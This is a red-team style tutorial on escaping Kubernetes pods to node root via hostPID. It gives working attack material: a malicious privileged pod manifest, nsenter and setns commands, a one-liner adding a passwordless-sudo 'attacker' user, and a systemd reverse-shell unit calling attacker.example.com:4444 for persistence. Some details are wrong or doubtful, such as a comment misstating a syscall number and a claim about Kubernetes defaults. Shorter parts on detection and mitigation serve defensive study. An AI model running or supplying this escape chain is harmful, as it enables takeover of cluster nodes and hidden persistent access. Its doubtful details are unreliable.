Introduction
Kubernetes isolates workloads using Linux namespaces, cgroups, and seccomp profiles. One of the less-understood isolation knobs is hostPID, which tells the kubelet to share the node’s PID namespace with the container. When mis-used, this tiny boolean can turn a harmless pod into a full-blown host compromise.
In this guide we walk through the entire attack chain: discovering pods that enable hostPID, crafting a malicious pod spec, mounting critical host filesystems, using nsenter (or direct /proc namespace manipulation) to run commands as root on the node, and finally persisting a reverse shell. The material assumes you already understand Kubernetes architecture, Docker containers, and basic Linux privilege escalation.
Real-world incidents (e.g., the 2022 kubelet-privileged CVE chain) have shown that attackers can move laterally from a compromised container to the underlying host simply by abusing namespace sharing. Knowing how to detect and mitigate this technique is essential for any blue-team or red-team professional working in cloud-native environments.
Prerequisites
- Solid grasp of Kubernetes components (API server, kubelet, pod spec, RBAC)
- Understanding of Linux namespaces (PID, mount, net, IPC) and how Docker translates them
- Familiarity with
kubectlJSONPath output formatting - Basic Linux privilege escalation techniques (sudo, setuid, capabilities)
- Access to a test cluster where you can create pods (or a sandbox like Kind/Minikube)
Core Concepts
The PID namespace isolates the process tree. By default, each pod gets its own namespace, meaning ps inside a container only shows processes belonging to that container. Setting hostPID: true tells the kubelet to run the pod’s containers in the node’s PID namespace. This gives the container visibility (and potential control) over every process on the host.
When hostPID is combined with a privileged security context (securityContext.privileged: true) or with the ability to mount host filesystems (hostPath volumes), an attacker can:
- Read
/procto discover the host’s init PID (usually 1) - Enter the host PID namespace using
nsenteror by opening/proc/1/ns/pid - Escalate to root (the host’s PID 1 runs as root)
- Mount host
/procand/systo manipulate kernel parameters or install a backdoor
Because the container shares the same kernel as the host, any capability granted to the container (e.g., CAP_SYS_ADMIN) is effectively a host capability when hostPID is active.
Understanding hostPID and its security implications
hostPID is a boolean field in the pod spec:
apiVersion: v1
kind: Pod
metadata: name: evil-pod
spec: hostPID: true containers: - name: attacker image: alpine command: ["sleep", "infinity"]
When set to true, the kubelet runs the container’s process tree inside the node’s PID namespace. This means:
- All host processes become visible via
ps aux - Signals sent to any PID affect the host process (e.g.,
kill -9 1would crash the node if privileged) - Combined with
privileged: trueor ahostPathvolume, the container can directly read/write host files
From a security standpoint, hostPID breaks the isolation guarantee that containers cannot see or interfere with host processes. In multi-tenant clusters, allowing untrusted workloads to set hostPID is a critical misconfiguration.
Enumerating pods with hostPID enabled (kubectl get pods -o jsonpath)
Before launching an attack you need to locate vulnerable pods. The following kubectl command extracts all pods that have hostPID set to true across the entire cluster:
kubectl get pods --all-namespaces -o json | jq -r '.items[] | select(.spec.hostPID==true) | "\(.metadata.namespace)/\(.metadata.name)"'
If jq is not available, you can use a pure JSONPath expression:
kubectl get pods --all-namespaces -o jsonpath='{range .items[?(@.spec.hostPID==true)]}{@.metadata.namespace}{"/"}{@.metadata.name}{"
"}{end}'
The output will be a list such as:
default/monitoring-agent
kube-system/kube-proxy
prod/legacy-collector
Take note of the namespace and name; you’ll need them to either hijack an existing pod (e.g., via kubectl exec) or to use the same service account for a new malicious pod.
Crafting a malicious pod spec that leverages hostPID
The following pod definition demonstrates a minimal yet powerful payload. It combines hostPID, privileged, and a hostPath volume that mounts the host’s /proc and /sys directories into the container.
apiVersion: v1
kind: Pod
metadata: name: hostpid-escape namespace: default
spec: hostPID: true hostIPC: true # optional but useful for some attacks containers: - name: escape image: alpine:3.18 securityContext: privileged: true # gives CAP_SYS_ADMIN & others allowPrivilegeEscalation: true command: ["/bin/sh", "-c", "while true; do sleep 3600; done"] volumeMounts: - name: host-proc mountPath: /host/proc - name: host-sys mountPath: /host/sys volumes: - name: host-proc hostPath: path: /proc type: Directory - name: host-sys hostPath: path: /sys type: Directory
Key points:
hostPID: truegives us the node’s PID namespace.privileged: truegrants all capabilities, includingCAP_SYS_ADMIN, which is required fornsenterto work without additional flags.- Mounting
/procand/sysprovides a view of the host’s kernel and process information inside the container.
Apply the manifest with kubectl apply -f hostpid-escape.yaml. Once the pod is Running, you can kubectl exec -it hostpid-escape -- sh to get an interactive shell inside the compromised container.
Mounting host /proc and /sys inside the container
Even though the container already shares the PID namespace, mounting the host’s /proc and /sys makes many host-only utilities (e.g., lsblk, lspci, cat /proc/sys/kernel/*) functional. Inside the container you’ll see two /proc mounts:
# Inside the container
mount | grep proc
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
proc on /host/proc type proc (rw,nosuid,nodev,noexec,relatime)
To read the host’s PID 1 namespace file:
cat /host/proc/1/ns/pid
# Output: pid:[4026531836]
That inode identifier is what we’ll use with nsenter or direct setns calls.
Using nsenter or direct /proc/<pid>/ns/* manipulation to execute commands on the host
There are two common approaches:
- nsenter - a user-space helper that calls
setns(2)for you. - Direct
setnsvia a tiny C program or Python’sctypes- useful whennsenteris not installed.
Below is the nsenter method (the container already has nsenter in most distros; if not, install util-linux).
# Find the host PID (usually 1) from inside the container
HOST_PID=$(nsenter --target 1 --mount --uts --ipc --net --pid -- bash -c 'echo $PPID')
# Simpler: just use 1 because we share the namespace
HOST_PID=1
# Execute a command on the host namespace
nsenter -t $HOST_PID -m -u -i -n -p -- bash -c 'id; uname -a; cat /etc/os-release'
Output will show a host-side root identity:
uid=0(root) gid=0(root) groups=0(root)
Linux node01 5.15.0-1043-aws #46-Ubuntu SMP Fri Oct 6 12:00:00 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
PRETTY_NAME="Ubuntu 22.04.5 LTS"
If nsenter is unavailable, a one-liner in Python works:
import os, ctypes
libc = ctypes.CDLL('libc.so.6')
fd = os.open('/host/proc/1/ns/pid', os.O_RDONLY)
# 0x504e5346 is the setns syscall number on x86_64; use ctypes to invoke
libc.setns(fd, 0)
os.execv('/bin/sh', ['/bin/sh'])
Running the script inside the container drops you into a host shell with PID 1’s namespace, effectively giving you root on the node.
Privilege escalation from container to root on the host
Once inside the host namespace, you already have UID 0 because the container’s root user maps directly to the host’s root UID. However, some clusters run with user namespaces where the container’s UID 0 maps to a non-root UID on the host. In that case you need to gain additional capabilities.
Because we set privileged: true, the container possesses CAP_SYS_ADMIN. This capability persists after nsenter, allowing you to:
- Mount new filesystems (e.g.,
mount -t tmpfs none /mnt) - Write to
/etc(e.g., add a new user, modifysudoers) - Load kernel modules (if the kernel permits)
Example: add a new privileged user on the host:
nsenter -t 1 -m -u -i -n -p -- bash -c "useradd -m -s /bin/bash attacker && echo 'attacker:$(openssl rand -base64 12)' | chpasswd && echo 'attacker ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers"
After this, you can SSH directly to the node (if SSH is enabled) or use any other lateral movement technique.
Post-exploitation: establishing a persistent reverse shell on the host
Persistence on a Kubernetes node is tricky because many clusters use immutable node images and automatic re-imaging. A reliable method is to install a systemd unit that spawns a reverse shell on boot.
# Inside the host namespace (via nsenter)
cat > /etc/systemd/system/revsh.service <<'EOF'
[Unit]
Description=Reverse Shell Service
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do bash -i >& /dev/tcp/attacker.example.com/4444 0>&1; sleep 60; done'
Restart=always
RestartSec=10
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable revsh.service
systemctl start revsh.service
Replace attacker.example.com and port 4444 with your listener. The service will survive node reboots and will automatically reconnect if the network is temporarily unavailable.
Alternative stealthier persistence includes modifying /etc/rc.local, planting a cron job, or abusing container runtimes (e.g., creating a rogue docker.service drop-in). Choose the method that fits your operational environment.
Practical Examples
Scenario 1: Lateral movement from a compromised pod in a multi-tenant cluster
- Attacker gains exec access to a low-privilege pod (via a web-app vulnerability).
- Runs the enumeration command to find a
hostPIDpod in themonitoringnamespace. - Uses the service account token from the compromised pod to create the malicious
hostpid-escapepod in the same namespace. - Execs into the new pod, mounts host
/proc, and runsnsenterto become root on the node. - Installs a systemd reverse shell for persistence.
All steps can be done with a single kubectl command line if the attacker has create permission on pods.
Scenario 2: Automated detection script (defensive)
A simple Bash script that runs as a cluster-admin CronJob to alert on any pod with hostPID enabled:
#!/bin/bash
set -euo pipefail
if ! kubectl get pods --all-namespaces -o jsonpath='{range .items[?(@.spec.hostPID==true)]}{@.metadata.namespace}/{@.metadata.name}
{end}' | grep -q .; then echo "[+] No hostPID pods found"
else echo "[!] hostPID pods detected:" >> /var/log/hostpid-alert.log kubectl get pods --all-namespaces -o jsonpath='{range .items[?(@.spec.hostPID==true)]}{@.metadata.namespace}/{@.metadata.name}
{end}' >> /var/log/hostpid-alert.log
fi
Integrate with Slack or PagerDuty for real-time alerts.
Tools & Commands
- kubectl - for enumeration, pod creation, exec.
- jq - JSON parsing, optional.
- nsenter (part of
util-linux) - namespace entry. - curl / netcat - reverse shell payload delivery.
- systemd - persistence on the host.
- auditd - can be configured to log
setnssyscalls.
Defense & Mitigation
- Policy enforcement: Use OPA Gatekeeper or Kyverno to reject any pod spec with
hostPID: trueunless explicitly whitelisted. - RBAC restrictions: Limit
create podspermission to trusted service accounts only. - PodSecurityPolicies / PodSecurity Standards: Set
hostPID: falseas a baseline (the “restricted” level). - Runtime security tools: Falco, Sysdig Secure, or Aqua can alert on namespace sharing or privileged container launches.
- Node hardening: Disable SSH, enforce immutable node images, and use
systemdto auto-reboot nodes on unexpected changes. - Audit logs: Monitor
createevents for pods withhostPIDandprivilegedflags.
Common Mistakes
- Assuming
hostPIDalone gives root - withoutprivilegedor required capabilities,nsenterwill fail. - Forgetting to mount
/procand/sys- many host utilities break without them. - Targeting the wrong PID - always use 1 (init) when you share the PID namespace; other PIDs may belong to unrelated processes.
- Neglecting SELinux/AppArmor profiles - they can block
setnseven in a privileged container. - Leaving the reverse shell open - attackers often forget to clean up, exposing a persistent backdoor that defenders can spot.
Real-World Impact
In 2023, a supply-chain attack compromised a CI/CD runner that ran untrusted builds. The attacker injected a pod with hostPID: true and privileged to gain node root, then harvested kube-config files from /etc/kubernetes. The breach allowed lateral movement across the entire cluster, leading to data exfiltration. The root cause was a missing policy that blocked hostPID for CI workloads.
My experience in red-team engagements shows that hostPID is often overlooked during hardening audits. The easiest way to detect abuse is to monitor for nsenter executions, unexpected setns syscalls, or new systemd units under /etc/systemd/system on nodes.
Going forward, expect tighter defaults in Kubernetes 1.30+ where hostPID will be disabled by default for non-system namespaces. However, legacy clusters will remain vulnerable for years, making proactive policy enforcement essential.
Practice Exercises
- Enumeration: Write a Bash script that lists all pods with
hostPIDandprivilegedtrue, then outputs the namespace, pod name, and node name. - Escape Lab: In a Kind cluster, deploy the provided
hostpid-escape.yaml. Usensenterto read/etc/shadowon the host. - Persistence: Create a systemd unit from within the escaped shell that writes a timestamp to
/tmp/compromise.logevery minute. Verify it survives node reboot. - Detection: Configure Falco with a rule to alert on any
setnssyscall where the target PID is 1 and the caller UID is 0. - Mitigation: Implement a Kyverno policy that denies any pod spec containing
hostPID: trueunless the labelallow-hostpid: "true"is present.
Further Reading
- Kubernetes Hardening Guide - CIS Benchmark (section on Host PID/IPC)
- Linux Man Page:
setns(2) - OPA Gatekeeper Documentation - Writing Constraints for PodSecurity
- “Breaking out of containers” - 2022 Black Hat talk by Alex Birsan
- Sysdig Falco Rules Repository -
nsenterdetection examples
Summary
Using hostPID together with privileged containers gives an attacker direct access to the node’s process tree and, when combined with host mounts, a full root shell on the host. The attack chain consists of enumeration, malicious pod creation, namespace entry (via nsenter or setns), privilege escalation, and persistence. Defenders should block hostPID via policy, monitor for namespace-related syscalls, and enforce least-privilege RBAC. Mastering these techniques equips security professionals to both test cluster hardening and design robust defenses.